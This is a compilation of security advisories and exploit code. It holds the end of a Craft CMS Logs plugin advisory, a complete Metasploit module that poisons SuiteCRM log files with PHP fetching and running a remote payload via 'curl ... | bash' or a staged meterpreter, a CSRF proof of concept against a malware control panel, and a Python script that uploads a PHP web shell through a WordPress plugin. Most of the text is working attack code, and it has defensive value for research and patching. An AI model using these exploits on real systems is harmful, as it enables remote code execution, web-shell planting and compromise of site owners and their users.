https://plugins.craftcms.com/logs<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-07-07: Contacting vendor through dev@ethercreative.co.uk<br />2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible<br /> for any risks involved with plaintext communication<br />2021-07-08: Advisory was sent to vendor 
unencrypted<br />2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4<br /> (https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)<br />2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation<br /> (CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)<br />2022-01-24: Release of security advisory<br /><br /><br />Solution:<br />---------<br />The vendor released a patched version 3.0.4 or higher which can be retrieved from their<br />website/github:<br />https://plugins.craftcms.com/logs<br />https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4<br /><br /><br />Workaround:<br />-----------<br />Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Steffen Rogge / @2022<br /><br /><br /></code></pre>
<pre><code>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# SuiteCRM log-file remote code execution (CVE-2021-42840; the references below
# say it also covers CVE-2020-28328 / EDB 49001).
#
# Flow as implemented in this file: authenticate as an administrative user,
# change the application log file extension to '.pHp' (the mixed-case extension
# the description says is not rejected), save PHP code as the admin user's
# last name so that it is written into the log, then request the log file so
# the web server executes it. RESTORECONF (default true) puts the log settings
# and the last name back afterwards.
#
# Artifacts this code leaves, useful for detection and forensics: a log file
# named &lt;8 alphanumerics&gt;.pHp reachable under TARGETURI, a Configurator
# 'SaveConfig' POST that sets logger_file_ext to '.pHp', and a Users 'Save'
# POST whose last_name field contains '&lt;?php'. 'SideEffects' below declares
# ARTIFACTS_ON_DISK and IOC_IN_LOGS for the same reason.
#
# Instance state shared between methods: @authenticated and @is_admin (set in
# auth_succeeded?), @php_fname (modify_system_settings_file), @meterpreter_fname
# (poison_log_file, non-cmd target only) and @download_url (start_http_server).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SuiteCRM Log File Remote Code Execution',
        'Description' => %q{
          This module exploits an input validation error on the log file extension parameter. It does
          not properly validate upper/lower case characters. Once this occurs, the application log file
          will be treated as a php file. The log file can then be populated with php code by changing the
          username of a valid user, as this info is logged. The php code in the file can then be executed
          by sending an HTTP request to the log file. A similar issue was reported by the same researcher
          where a blank file extension could be supplied and the extension could be provided in the file
          name. This exploit will work on those versions as well, and those references are included.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'M. Cory Billington' # @_th3y
        ],
        'References' => [
          ['CVE', '2021-42840'],
          ['CVE', '2020-28328'], # First CVE
          ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.
          ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
          ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
        ],
        'Platform' => %w[linux unix],
        'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
        'Targets' => [
          [
            'Linux (x64)', {
              'Arch' => ARCH_X64,
              'Platform' => 'linux',
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'Linux (cmd)', {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix',
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        },
        'Privileged' => true,
        'DisclosureDate' => '2021-04-28',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),
        OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),
        OptString.new('PASS', [true, 'Password for administrator', 'admin']),
        OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),
        OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
        OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
      ]
    )
  end

  # AutoCheck hook: logs in, fetches Home/About and compares the scraped
  # "Version X.Y.Z" string against 7.11.18; anything less than or equal is
  # reported as Appears, anything newer as Safe.
  #
  # NOTE(review): when the regex does not match, version_match is nil and the
  # .partition call raises before the nil/empty guard below is reached -- that
  # guard only ever sees an empty string, never nil.
  # NOTE(review): the local is named patched_version, yet a version equal to
  # it is still reported as Appears (<=); confirm the intended boundary.
  def check
    authenticate unless @authenticated
    return Exploit::CheckCode::Unknown unless @authenticated

    version_check_request = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Home',
          'action' => 'About'
        }
      }
    )

    return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request

    version_match = version_check_request.body[/
      Version
      \s
      \d{1} # Major revision
      \.
      \d{1,2} # Minor revision
      \.
      \d{1,2} # Bug fix release
    /x]

    version = version_match.partition(' ').last

    if version.nil? || version.empty?
      about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
      return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")
    end

    patched_version = Rex::Version.new('7.11.18')
    current_version = Rex::Version.new(version)

    return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version

    Exploit::CheckCode::Safe("SuiteCRM #{version}")
  end

  # Three-step login with the USER/PASS datastore credentials: GET the login
  # page (must be 200), POST the credentials (must be 302), then GET
  # Administration/index and let auth_succeeded? decide. Returns false at the
  # first step that does not get the expected status. Cookies are carried
  # between requests via 'keep_cookies'.
  def authenticate
    print_status("Authenticating as #{datastore['USER']}")
    initial_req = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Users',
          'action' => 'Login'
        }
      }
    )

    return false unless initial_req && initial_req.code == 200

    login = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_post' => {
          'module' => 'Users',
          'action' => 'Authenticate',
          'return_module' => 'Users',
          'return_action' => 'Login',
          'user_name' => datastore['USER'],
          'username_password' => datastore['PASS'],
          'Login' => 'Log In'
        }
      }
    )

    return false unless login && login.code == 302

    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Administration',
          'action' => 'index'
        }
      }
    )

    auth_succeeded?(res)
  end

  # Interprets the Administration/index response from authenticate: a 200
  # sets @authenticated; @is_admin is false when the body contains the
  # 'Unauthorized access to administration.' marker, true otherwise.
  # Returns true only on a 200.
  def auth_succeeded?(res)
    return false unless res

    if res.code == 200
      print_good("Authenticated as: #{datastore['USER']}")
      if res.body.include?('Unauthorized access to administration.')
        print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")
        @is_admin = false
      else
        print_good("#{datastore['USER']} has administrative rights.")
        @is_admin = true
      end
      @authenticated = true
      return true
    else
      print_error("Failed to authenticate as: #{datastore['USER']}")
      return false
    end
  end

  # POSTs the multipart body `data` (a Rex::MIME::Message) to index.php with a
  # Configurator EditView Referer, reusing the session cookies. Returns the
  # raw response, which may be nil on a connection failure.
  def post_log_file(data)
    send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'ctype' => "multipart/form-data; boundary=#{data.bound}",
        'keep_cookies' => true,
        'headers' => {
          'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"
        },
        'data' => data.to_s
      }
    )
  end

  # Step 1: Configurator SaveConfig with a random 8-character log file name,
  # the mixed-case '.pHp' extension and level 'info'. The resulting file name
  # is kept in @php_fname for execute_php. check_logfile_request aborts the
  # module unless the reply is a 301.
  def modify_system_settings_file
    filename = rand_text_alphanumeric(8).to_s
    extension = '.pHp'
    @php_fname = filename + extension
    action = 'Modify system settings file'
    print_status("Trying - #{action}")

    data = Rex::MIME::Message.new
    data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
    data.add_part('Configurator', nil, nil, 'form-data; name="module"')
    data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"')
    data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"')
    data.add_part('info', nil, nil, 'form-data; name="logger_level"')
    data.add_part('Save', nil, nil, 'form-data; name="save"')

    res = post_log_file(data)
    check_logfile_request(res, action)
  end

  # Step 2: gets PHP into the log by saving it as the last_name of user
  # record '1'. For the cmd target the PHP pipes the served payload to bash;
  # otherwise it is saved under WRITABLEDIR with a random name (@meterpreter_fname)
  # and executed. @download_url must already be set by start_http_server.
  # Aborts unless the save reply is a 301.
  def poison_log_file
    action = 'Poison log file'
    if target.arch.first == 'cmd'
      command_injection = "<?php `curl #{@download_url} | bash`; ?>"
    else
      @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}"
      command_injection = %(
        <?php `curl #{@download_url} -o #{@meterpreter_fname};
        /bin/chmod 700 #{@meterpreter_fname};
        /bin/sh -c #{@meterpreter_fname};`; ?>
      )
    end

    print_status("Trying - #{action}")

    data = Rex::MIME::Message.new
    data.add_part('Users', nil, nil, 'form-data; name="module"')
    data.add_part('1', nil, nil, 'form-data; name="record"')
    data.add_part('Save', nil, nil, 'form-data; name="action"')
    data.add_part('EditView', nil, nil, 'form-data; name="page"')
    data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
    data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
    data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')

    res = post_log_file(data)
    check_logfile_request(res, action)
  end

  # Cleanup run from exploit's ensure clause when RESTORECONF is set: puts the
  # logger back to suitecrm / .log / fatal and the user's last_name back to
  # LASTNAME. Only the second request's status is checked.
  #
  # NOTE(review): print_good is unconditional, so a failed restore prints both
  # "Failed - ..." and "Succeeded - ...". Because this runs from ensure, it can
  # also be reached before authentication succeeded.
  def restore
    action = 'Restore logging to default configuration'
    print_status("Trying - #{action}")

    data = Rex::MIME::Message.new
    data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
    data.add_part('Configurator', nil, nil, 'form-data; name="module"')
    data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')
    data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')
    data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')
    data.add_part('Save', nil, nil, 'form-data; name="save"')

    post_log_file(data)

    data = Rex::MIME::Message.new
    data.add_part('Users', nil, nil, 'form-data; name="module"')
    data.add_part('1', nil, nil, 'form-data; name="record"')
    data.add_part('Save', nil, nil, 'form-data; name="action"')
    data.add_part('EditView', nil, nil, 'form-data; name="page"')
    data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
    data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
    data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')

    res = post_log_file(data)

    print_error("Failed - #{action}") unless res && res.code == 301

    print_good("Succeeded - #{action}")
  end

  # Shared result check for the two Save POSTs: a 301 counts as success; no
  # reply raises Failure::Unknown and any other status Failure::UnexpectedReply.
  def check_logfile_request(res, action)
    fail_with(Failure::Unknown, "#{action} - no reply") unless res

    unless res.code == 301
      print_error("Failed - #{action}")
      fail_with(Failure::UnexpectedReply, "Failed - #{action}")
    end

    print_good("Succeeded - #{action}")
  end

  # Step 3: GETs the poisoned log file under TARGETURI so the server runs it.
  # Only a 404 is treated as fatal. The log file and, when set, the staged
  # binary are registered with FileDropper so the session cleanup removes them.
  def execute_php
    print_status("Executing php code in log file: #{@php_fname}")
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri, @php_fname),
        'keep_cookies' => true
      }
    )
    fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404
    register_files_for_cleanup(@php_fname)
    register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?
  end

  # Handler for the staging HTTP service: answers any request with the
  # encoded payload as text/plain.
  def on_request_uri(cli, _request)
    send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
    print_good("#{peer} - Payload sent!")
  end

  # Starts the payload-serving HTTP service at resource_uri and records its
  # URL in @download_url for poison_log_file.
  def start_http_server
    start_service(
      {
        'Uri' => {
          'Proc' => proc do |cli, req|
            on_request_uri(cli, req)
          end,
          'Path' => resource_uri
        }
      }
    )
    @download_url = get_uri
  end

  # Main sequence. The staging server is started before authentication; a
  # missing session or a non-admin user aborts with Failure::NoAccess. The
  # ensure clause runs restore whenever RESTORECONF is set, including after an
  # early fail_with.
  def exploit
    start_http_server
    authenticate unless @authenticated
    fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated
    fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin
    modify_system_settings_file
    poison_log_file
    execute_php
  ensure
    restore if datastore['RESTORECONF']
  end
end

</code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/61285c988de52b7c067fb2e703f2ab83_C.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CosaNostra Builder WebPanel <br />Vulnerability: Cross Site Request Forgery (CSRF)<br />Description: The Panel does not provide a CSRF security token to verify and process only authorized HTTP POST requests for "tasks.php". This can allow unauthorized deletion of tasks from the MySQL database if a panel user clicks an infected link or visits a malicious webpage, the bot HWID however would need to be known up front or guessed.<br /><br />$id = @$_GET['id'];<br /> if(isset($id)){<br /> mysqli_query($condb,"DELETE FROM `tasks` WHERE `HWID`='$id'");<br /><br /><br />Type: WebUI<br />MD5: 61285c988de52b7c067fb2e703f2ab83<br />MD5: de5d209faa9dfbcd1d5e551273ae9c06 (tasks.php)<br />Vuln ID: MVID-2022-0473<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />HREF="http://MALWARE_C2_IP/WebPanel/Panel/tasks.php?id=3"<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>
# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
# Google Dork: inurl: /wp-content/plugins/smart-product-review/
# Date: 16/11/2021
# Exploit Author: Keyvan Hardani
# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
# Version: <= 1.0.4
# Tested on: Kali Linux

# NOTE(review): os.path and json are imported but never used; only `path`
# (from os) is referenced below. requests is a third-party dependency.
import os.path
from os import path
import json
import requests;
import time
import sys

def banner() -> None:
    """Show a short terminal spinner, then print the tool banner."""
    animation = "|/-\\"
    for i in range(20):
        time.sleep(0.1)
        # cycle through the four spinner characters, overwriting the same line
        sys.stdout.write("\r" + animation[i % len(animation)])
        sys.stdout.flush()
        #do something
    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")

def usage() -> None:
    """Print the command-line usage; argv[1] is the site URL, argv[2] the file to upload."""
    print("Usage: python3 exploit.py [target url] [your shell]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri: str) -> bool:
    """Return False when the GET response body contains the
    "No script kiddies please!!" marker, True otherwise.

    This is only a presence/refusal check on the admin-ajax action; a True
    result does not by itself prove the upload handler misbehaves.
    """
    response = requests.get(uri)
    raw = response.text

    if ("No script kiddies please!!" in raw):
        return False;
    else:
        return True;

def main() -> None:
    """Entry point: validates argv, probes the AJAX action, then POSTs the file.

    The form data below is what the title refers to: the allowedExtensions[]
    list (including php4 and phtml) and a fixed file_uploader_nonce value are
    sent by the client; presumably the server honours that client-supplied
    list, which would be the root cause -- not verifiable from this script.
    """

    banner()
    if(len(sys.argv) != 3):
        usage();
        sys.exit(1);

    base = sys.argv[1]
    file_path = sys.argv[2]

    # plugin AJAX action reached through WordPress's admin-ajax.php
    ajax_action = 'sprw_file_upload_action'
    admin = '/wp-admin/admin-ajax.php';

    uri = base + admin + '?action=' + ajax_action ;
    check = vuln_check(uri);

    if(check == False):
        print("(*) Target not vulnerable!");
        sys.exit(1)

    if( path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)

    # NOTE(review): the file handle opened here is never closed (no `with`).
    files = {'files[]' : open(file_path)}
    data = {
        "allowedExtensions[0]" : "jpg",
        "allowedExtensions[1]" : "php4",
        "allowedExtensions[2]" : "phtml",
        "allowedExtensions[3]" : "png",
        "qqfile" : "files",
        "element_id" : "6837",
        "sizeLimit" : "12000000",
        # hard-coded nonce; its origin is not shown here -- confirm whether
        # the endpoint validates it at all
        "file_uploader_nonce" : "2b102311b7"
    }
    print("Uploading Shell...");
    response = requests.post(uri, files=files, data=data )
    # NOTE(review): file_name is computed but never used.
    file_name = path.basename(file_path)
    # success is inferred from the substring "ok" anywhere in the response body
    if("ok" in response.text):
        print("Shell Uploaded!")
        print("Shell URL on your Review/Comment");
    else:
        print("Shell Upload Failed")
        sys.exit(1)

# runs at import time: there is no __main__ guard
main();

</code></pre>